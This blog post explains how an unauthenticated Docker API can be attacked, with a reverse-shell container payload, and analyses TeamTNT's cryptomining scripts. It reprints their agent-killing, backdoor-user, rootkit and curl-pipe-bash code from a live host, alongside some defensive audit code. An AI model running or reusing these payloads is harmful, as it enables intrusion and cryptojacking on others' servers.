How a Search for a New Way to Exploit Unauthenticated Docker Turned into a Sample Analysis - FA1C0N

admin, 2021-12-31 15:11:45

Preface

Anyone who has looked at Docker container security knows that Docker's port 2375 has an unauthenticated-access problem. A while ago, while our team was building up its cloud security knowledge, we stumbled on ZoomEye across a malicious mining script that TeamTNT wrote specifically for Alibaba Cloud and Tencent Cloud. The sample is fairly interesting, and since it is a shell script rather than a binary the analysis is comparatively light: we walk through it briefly and make some guesses about how TeamTNT abuses port 2375 for mining and how the initial lateral movement into the internal network that follows works.

Docker 2375 exploitation

The traditional approach connects to the unauthenticated Docker API remotely with -H tcp://ip:2375 and runs a new container.

Then -v /:/mnt mounts the physical server's root directory into the container, and either an SSH public key is written into the host's /root/.ssh/authorized_keys file, or a reverse-shell script is written into /etc/crontab, to gain root on the host.

Is there a fancier way? Yes. The Docker API itself is an HTTP service, and the official documentation lists several operations that can spin up a new container.

Borrowing the idea from phith0n's earlier article 容器与云的碰撞——一次对 MinIO 的测试 (Containers meet the cloud: a test against MinIO), we went through the official documentation and found one API, /containers/create, that yields a stable reverse shell without disturbing the production environment and can mount the host's root directory.

The parameters accepted by /containers/create include the familiar Cmd, Tty and Binds, which map almost one-to-one onto the options of the run command.

POST /containers/create HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 579
Connection: close
Upgrade-Insecure-Requests: 1

{
  "Hostname": "",
  "Domainname": "",
  "User": "",
  "AttachStdin": false,
  "AttachStdout": true,
  "AttachStderr": true,
  "Tty": true,
  "OpenStdin": false,
  "StdinOnce": false,
  "Detach": true,
  "Image": "ubuntu:latest", # base image to use
  "Cmd":  ["/bin/bash", "-c", "bash -i>& /dev/tcp/ip/port 0>&1;while true;do echo hello world;sleep 1;done"], # command run when the container starts
  "Labels": {
    "com.example.vendor": "Acme",
    "com.example.license": "GPL",
    "com.example.version": "1.0"
  },
  "HostConfig": {
            "Binds": [
                "/:/mnt" # mount the host root directory under /mnt
            ]
  }
}

Although this looks very much like the parameters of the run command, the container still cannot be created if the Image does not exist locally, so we need to create one first by pulling it remotely with /images/create. (In a real environment you can also use an image that already exists.)

curl -X POST "http://ip/images/create?fromImage=ubuntu&tag=latest"

Finally, start the container just created from ubuntu with /containers/{id}/start:

curl -X POST "http://ip/containers/{id}/start"

Now we can happily carry on with the traditional attack flow.
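As an added example (my code, not the original post's or TeamTNT's), the following Python covers the two things a defender controls in the scenario above: whether dockerd is configured to listen on an unauthenticated tcp:// socket, and whether a container's inspect output matches the /containers/create payload shown above (host root bind-mounted, /dev/tcp reverse-shell Cmd). The daemon.json keys hosts and tlsverify and the inspect fields HostConfig.Binds, HostConfig.Privileged and Config.Cmd are Docker's own names; the sample JSON is constructed.

```python
"""Audit checks for the Docker Engine API exposure described above.

Added example, not code from the original post or from TeamTNT.  The
daemon.json keys (hosts, tlsverify) and the inspect fields (HostConfig.Binds,
HostConfig.Privileged, Config.Cmd) are Docker's own names; sample data is
constructed to mirror the /containers/create request shown in the post.
"""
import http.client
import json
import re
import socket

# Host paths that should never be bind-mounted into an untrusted container
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")
# Fragments typical of a shell-style Cmd like the one in the post's request
SUSPICIOUS_CMD = re.compile(r"/dev/tcp/|bash\s+-i\b|nc\s+-e\b")


def exposed_tcp_listeners(daemon_json):
    """Return (host, scope) for tcp:// entries in daemon.json 'hosts' that are
    not protected by tlsverify; scope 'network' is the 2375-style exposure."""
    cfg = json.loads(daemon_json)
    if cfg.get("tlsverify") is True:
        return []
    out = []
    for h in cfg.get("hosts", []):
        if h.startswith("tcp://"):
            bind = h[len("tcp://"):].rsplit(":", 1)[0]
            scope = "loopback" if bind in ("127.0.0.1", "localhost", "[::1]") else "network"
            out.append((h, scope))
    return out


def _sensitive_source(src):
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def inspect_findings(inspect_json):
    """Flag risky settings in the JSON from GET /containers/{id}/json."""
    c = json.loads(inspect_json)
    hc = c.get("HostConfig") or {}
    findings = []
    for bind in hc.get("Binds") or []:          # "src:dst[:opts]"
        src = bind.split(":", 1)[0]
        if _sensitive_source(src):
            findings.append(f"bind-mount of host path {src} ({bind})")
    if hc.get("Privileged"):
        findings.append("privileged container")
    cmd = " ".join((c.get("Config") or {}).get("Cmd") or [])
    if SUSPICIOUS_CMD.search(cmd):
        findings.append(f"suspicious Cmd: {cmd}")
    return findings


def audit_local_daemon(sock_path="/var/run/docker.sock"):
    """Run inspect_findings over every container on the local daemon via the
    Unix socket (not exercised by the offline demo below)."""
    def get(path):
        conn = http.client.HTTPConnection("localhost")
        conn.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        conn.sock.connect(sock_path)
        conn.request("GET", path)
        return conn.getresponse().read().decode()
    report = {}
    for c in json.loads(get("/containers/json?all=1")):
        hits = inspect_findings(get(f"/containers/{c['Id']}/json"))
        if hits:
            report[c["Id"][:12]] = hits
    return report


# Constructed samples: a daemon.json with the 2375 exposure and an inspect
# document shaped like the container the post creates.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAMPLE_INSPECT = json.dumps({
    "Id": "constructed0000",
    "Config": {"Image": "ubuntu:latest",
               "Cmd": ["/bin/bash", "-c", "bash -i>& /dev/tcp/ip/port 0>&1;while true;do echo hello world;sleep 1;done"]},
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
})

if __name__ == "__main__":
    print(exposed_tcp_listeners(SAMPLE_DAEMON_JSON))
    print(inspect_findings(SAMPLE_INSPECT))
```

Run audit_local_daemon() as root on a Docker host to get the same findings for every live container.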

Sample analysis

Back to the main topic. Since TeamTNT did not bother to hide their IP, it is hard to tell which method they used to exploit the unauthenticated Docker API; but the sample landed in our lap, so we analysed it to the end and took the opportunity to study their attack approach.

From the sample scripts we collected, TeamTNT first downloads cronb.sh inside the newly created Docker container; after it has set up the mining environment it goes on to download and run the remaining two scanning scripts. The main functions of the scripts are:

  1. cronb.sh
    • Remove protections: stop the relevant cloud security agents
    • Kill competing miners
    • Modify system settings
    • Install mining software and mine Monero
    • Stop its own mining process
    • Set up password-less login
    • Download the follow-up script cronis.sh
  2. cronis.sh
    • Download dependencies and install pnscan and masscan
    • Install and run cronscan
  3. cronscan
    • Start the scanner and download cronrs.sh
  4. cronrs.sh
    • Run the scanner to find unauthenticated Redis instances in the internal network and in parts of the Tencent Cloud and Alibaba Cloud IP ranges, widening the attack

Sample analysis: cronb.sh

Removing Alibaba Cloud's protection

stop_aegis_pkill()

stop_aegis_pkill(){
    pkill -9 AliYunDun >/dev/null 2>&1
    pkill -9 AliHids >/dev/null 2>&1
    pkill -9 AliHips >/dev/null 2>&1
    pkill -9 AliNet >/dev/null 2>&1
    pkill -9 AliSecGuard >/dev/null 2>&1
    pkill -9 AliYunDunUpdate >/dev/null 2>&1

    /usr/local/aegis/AliNet/AliNet --stopdriver
    /usr/local/aegis/alihips/AliHips --stopdriver
    /usr/local/aegis/AliSecGuard/AliSecGuard --stopdriver
    printf "%-40s %40s\n" "Stopping aegis" "[  OK  ]"
}

remove_aegis()

AEGIS_INSTALL_DIR="/opt/aegis"
# aegis: Alibaba Cloud Server Guard (安骑士) host security agent
remove_aegis(){
if [ -d "${AEGIS_INSTALL_DIR}" ];then
    umount ${AEGIS_INSTALL_DIR}/aegis_debug
    rm -rf ${AEGIS_INSTALL_DIR}/aegis_client
    rm -rf ${AEGIS_INSTALL_DIR}/aegis_update
    rm -rf ${AEGIS_INSTALL_DIR}/alihids
    rm -rf ${AEGIS_INSTALL_DIR}/globalcfg/domaincfg.ini
fi
}

uninstall_service()

uninstall_service() {

   if [ -f "/etc/init.d/aegis" ]; then
        /etc/init.d/aegis stop  >/dev/null 2>&1
        rm -f /etc/init.d/aegis 
   fi

    if [ $LINUX_RELEASE = "GENTOO" ]; then
        rc-update del aegis default 2>/dev/null
        if [ -f "/etc/runlevels/default/aegis" ]; then
            rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
        fi
    elif [ -f /etc/init.d/aegis ]; then
         /etc/init.d/aegis  uninstall
        for ((var=2; var<=5; var++)) do
            if [ -d "/etc/rc${var}.d/" ];then
                 rm -f "/etc/rc${var}.d/S80aegis"
            elif [ -d "/etc/rc.d/rc${var}.d" ];then
                rm -f "/etc/rc.d/rc${var}.d/S80aegis"
            fi
        done
    fi

}

Removing the Alibaba Cloud monitoring agent

if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
  /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor  
else
  export ARCHD=amd64
  if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCHD} ]; then
    /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCHD} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCHD} uninstall && rm -rf /usr/local/cloudmonitor 
  else
    echo "ali cloud monitor not running"
  fi
fi

Removing Tencent Cloud's protection

elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi

Disabling the two main Linux security mechanisms, SELinux and AppArmor

The variables MOxmrigMOD and MOxmrigSTOCK are defined; both actually point to xmrig. The script then defines the config file URL and the miner URL, a backup for each, the wallet address and the version of the malicious script.

setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service


MOxmrigMOD=http://112.253.11.38/mid.jpg
MOxmrigSTOCK=http://112.253.11.38/mid.jpg
miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg
config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg
config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg
WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.jokerd
VERSION=2.9

Installing Diamorphine to hide processes and escalate privileges

The archive is base64-encoded in advance and embedded in the bash script; at run time it is decoded back into a tar archive, extracted and built.

function installdia(){

DIA_TAR='<base64-encoded Diamorphine tar.gz, blob elided>'

chattr -ia / /etc/ /tmp/ /var/ /var/tmp/ 2>/dev/null
chattr -R -ia /tmp/ /var/tmp/ 2>/dev/null
chmod 1777 /tmp/ /var/tmp/ 2>/dev/null


if type yum 2>/dev/null 1>/dev/null; then yum clean all ; yum -y install gcc make kmod elfutils-libelf-devel; yum -y install "kernel-devel-uname-r == $(uname -r)" ; fi
if type apt 2>/dev/null 1>/dev/null; then apt update --fix-missing ; apt-get -y install gcc make kmod libelf-dev libelf-devel; apt-get -y install linux-headers-$(uname -r)  ; fi
if type apk 2>/dev/null 1>/dev/null; then apk update 2>/dev/null 1>/dev/null; apk add linux-headers 2>/dev/null ; fi

if [ ! -d "/var/tmp/.../dia/" ]; then mkdir -p /var/tmp/.../dia/ ; fi
echo $DIA_TAR | base64 -d > /var/tmp/.../dia/dia.tar.gz
tar xvf /var/tmp/.../dia/dia.tar.gz -C /var/tmp/.../dia/
rm -f /var/tmp/.../dia/dia.tar.gz
cd /var/tmp/.../dia/
make
}

Setting up password-less login

function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL [email protected]"
grep -q hilde /etc/passwd || chattr -ia /etc/passwd; 
grep -q hilde /etc/passwd || tntrecht -ia /etc/passwd; 
grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd; tntrecht +ia /etc/passwd
grep -q hilde /etc/shadow || chattr -ia /etc/shadow; 
grep -q hilde /etc/shadow || tntrecht -ia /etc/shadow; 
grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow; tntrecht +ia /etc/shadow
grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers; 
grep -q hilde /etc/sudoers || tntrecht -ia /etc/sudoers; 
grep -q hilde /etc/sudoers || echo 'hilde  ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers; tntrecht +i /etc/sudoers

mkdir /home/hilde/.ssh/ -p  
touch /home/hilde/.ssh/authorized_keys  
touch /home/hilde/.ssh/authorized_keys2  
chmod 600 /home/hilde/.ssh/authorized_keys
chmod 600 /home/hilde/.ssh/authorized_keys2
grep -q [email protected] /home/hilde/.ssh/authorized_keys || chattr -ia /home/hilde/.ssh/authorized_keys; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys || tntrecht -ia /home/hilde/.ssh/authorized_keys; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys || echo $RSAKEY > /home/hilde/.ssh/authorized_keys; chattr +ia /home/hilde/.ssh/authorized_keys; tntrecht +ia /home/hilde/.ssh/authorized_keys;
grep -q [email protected] /home/hilde/.ssh/authorized_keys2 || chattr -ia /home/hilde/.ssh/authorized_keys2; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys2 || tntrecht -ia /home/hilde/.ssh/authorized_keys2; 
grep -q [email protected] /home/hilde/.ssh/authorized_keys2 || echo $RSAKEY > /home/hilde/.ssh/authorized_keys2; chattr +ia /home/hilde/.ssh/authorized_keys2; tntrecht +ia /home/hilde/.ssh/authorized_keys2;
mkdir /root/.ssh/ -p  
touch /root/.ssh/authorized_keys  
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q [email protected] /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys; 
grep -q [email protected] /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys; 
grep -q [email protected] /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q [email protected] /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2; 
grep -q [email protected] /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2; 
grep -q [email protected] /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
}

Tests SSH connectivity, including the crypto functionality, login authentication, and whether the login authentication is for root; on failure it reports an error, on success it prints nothing. There are some odd commands here such as cur, which are explained in the next sample script.

function checksshkeys(){
if [ -f /var/tmp/.system/[ext4].log ]; then
curl  http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null
else 
curl  http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null
fi
cat /home/hilde/.ssh/authorized_keys|grep [email protected] >/dev/null
if (test $? -ne 0); then
curl  http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
else
curl  http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
fi

cat /root/.ssh/authorized_keys|grep [email protected] >/dev/null
if (test $? -ne 0); then
curl  http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
else
curl  http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
fi
}

Downloading the Monero mining components and testing whether they run

function SetupMoneroOcean1(){
# printing intentions
echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then
  echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"
fi

echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
[ -d $MOHOME/ ] || mkdir $MOHOME/
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then
  echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
fi
chmod +x $MOHOME/\[ext4\]
rm /tmp/xmrig.tar.gz

echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"
$MOHOME/[ext4] --help >/dev/null
if (test $? -ne 0); then
  if [ -f $MOHOME/[ext4] ]; then
    echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"
  else 
    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
  fi

  echo "[*] Looking for the latest version of Monero miner"
  #LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest  | grep -o '".*"' | sed 's/"//g'`
  LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK

  echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"
  if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then
    echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
  fi

  echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
  if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then
    echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
  fi
  rm /tmp/xmrig.tar.gz
chmod +x $MOHOME/\[ext4\]

  echo "[*] Checking if stock version is OKAY!"
  $MOHOME/[ext4] --help >/dev/null
  if (test $? -ne 0); then 
    if [ -f $MOHOME/[ext4] ]; then
      echo "ERROR: Stock version of $MOHOME/[ext4] is not functional too"
    else 
      echo "ERROR: Stock version of $MOHOME/[ext4] was removed by antivirus too"
    fi
    echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
  fi
fi

echo "[*] $MOHOME/[ext4] is OK"
}

The TeamTNT crew's banner

######################### printing greetings ###########################
clear
echo -e " "
echo -e "                                \e[1;34;49m___________                 _____________________________\033[0m"
echo -e "                                \e[1;34;49m\__    ___/___ _____    ____\__    ___/\      \__    ___/\033[0m"
echo -e "                                \e[1;34;49m  |    |_/ __ \\__  \  /     \|    |   /   |   \|    |   \033[0m"
echo -e "                                \e[1;34;49m  |    |\  ___/ / __ \|  Y Y  \    |  /    |    \    |   \033[0m"
echo -e "                                \e[1;34;49m  |____| \___  >____  /__|_|  /____|  \____|__  /____|   \033[0m"
echo -e "                                \e[1;34;49m             \/     \/      \/                \/         \033[0m"
echo -e " "
echo -e "                                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "
echo -e " "
echo -e "                                \e[1;34;49m            Now you get, what i want to give... --- '''      \033[0m"
echo " "
echo " "

Checking prerequisites

It checks the wallet address length, the runtime environment, whether the curl command exists, and whether the previously downloaded config file and other software are present; if not, the SetupMoneroOcean1 function is run. The config file is then adjusted in advance: the mining pool is replaced, the CPU usage is capped, and so on.

# checking prerequisites

if [ -z $WALLET ]; then
  echo "ERROR: wallet"
fi

WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 ]; then
  echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"
fi

if [ -z $MOHOME ]; then
  echo "ERROR: Please define HOME environment variable to your home directory"
fi

if [ ! -d $MOHOME ]; then
  echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"
  echo '  export HOME=<dir>'
fi


if ! type curl >/dev/null; then
apt-get update --fix-missing 2>/dev/null 1>/dev/null
apt-get install -y curl 2>/dev/null 1>/dev/null
apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
yum install -y curl 2>/dev/null 1>/dev/null
yum reinstall -y curl 2>/dev/null 1>/dev/null
fi

sleep 2
$MOHOME/[ext4] --help >/dev/null
if (test $? -ne 0); then
    SetupMoneroOcean1
else
    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
fi

if [ -f "$MOHOME/[ext4].pid" ]
 then
         echo "config file exists, neednot backup"
 else
         echo "config file not exists.download from teamtnt"
         SetupMoneroOcean1
fi


if [ -f "$MOHOME/[ext4]" ]
 then
         echo "miner file exists"
 else
         curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig  $MOHOME/\[ext4\]
fi

if [ -f "$MOHOME/[ext4].pid" ]
then
    echo "miner config exists"
else
    curl -L --progress-bar $config_url -o  $MOHOME/\[ext4\].pid
fi

rm /tmp/xmrig.tar.gz

if [ -f "$MOHOME/[ext4]" ]
 then
         echo "miner file exists, neednot backup"
 else
         curl -L --progress-bar $miner_url_backup -o  /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[ext4\]
fi

rm /tmp/cf.tar


sed -i 's/"url": *"[^"]*",/"url": "xmr-asia1.nanopool.org:14444",/' $MOHOME/[ext4].pid
sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $MOHOME/[ext4].pid
sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[ext4].pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 50,/' $MOHOME/[ext4].pid
sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[ext4].log'",#' $MOHOME/[ext4].pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[ext4].pid

cp $MOHOME/[ext4].pid $MOHOME/config_background.json
sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json

Silently downloading and running cronis.sh

echo ""
echo "[*] Setup complete"
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash || cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
history -c

Sample analysis: cronis.sh

Renaming commands to evade detection

Variables are created for later use, and the commands are renamed to bypass detection mechanisms.

rtdir="/etc/svcupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
sleep $( seq 3 7 | sort -R | head -n1 )

Installing the scanners

Install the pnscan and masscan scanners and download the follow-up script cronscan

sleep 1
echo "DER Uninstalled"
if ! [ -x "$(command -v masscan)" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
$bbdira -sL -o x1.tar.gz http://oracle.zzhreceive.top/b2f628fff19fda999999999/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
echo "Masscan Installed"
fi
echo "Masscan Already Installed"
sleep 3 && rm -rf .watch
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
$bbdira -sL -o .x112 http://oracle.zzhreceive.top/b2f628/p.tar || $ccdira -q -O .x112 http://oracle.zzhreceive.top/b2f628/p.tar 
sleep 1
[ -f .x112 ] && tar xf .x112&& cd pnscan && ./configure && make && make install && cd .. && rm -rf pnscan .x112
echo "Pnscan Installed"
fi
echo "Pnscan Already Installed"

$bbdir -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash
$bbdira -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash

Sample analysis: cronscan

Download cronrs.sh, create a scan service, and start the pnscan and masscan scanners

if ! type systemctl >/dev/null; then

    $aabb -fsSL http://oracle.zzhreceive.top/b2f628/cronrs.sh | bash

  else

    echo "[*] Creating scan systemd service"
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/cronrs.sh -o /var/tmp/.system/\[scan\] && chmod 744 /var/tmp/.system/\[scan\]
    cat >/tmp/scan.service <<EOL
[Service]
ExecStart=/var/tmp/.system/[scan]
Restart=always

[Install]
WantedBy=default.target
EOL
    sudo mv /tmp/scan.service /etc/systemd/system/scan.service
    echo "[*] Starting scan systemd service"
    sudo killall [scan] 2>/dev/null
    sudo systemctl daemon-reload
    sudo systemctl enable scan.service
    sudo systemctl start scan.service
fi
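Pulling together the traces left by cronb.sh's makesshaxx() and installdia(), cronis.sh's renamed curl/wget binaries and the scan.service unit above, here is an added host-triage example (my code, not the sample's or the original post's). It checks a filesystem root for those indicators so it can also run against an offline-mounted disk image; make_demo_root() builds a constructed directory tree for the offline demo, and the key prefix is copied from the RSAKEY value in the sample.

```python
"""Host triage for the traces left by cronb.sh, cronis.sh and cronscan.

Added example; every indicator comes from the scripts quoted above.  'root'
lets the checks run against an offline-mounted disk image; make_demo_root()
builds a constructed directory tree so the demo runs without a real infection.
"""
import os
import tempfile

# Start of the public key written by makesshaxx() (copied from the sample)
TNT_KEY_PREFIX = "AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw"
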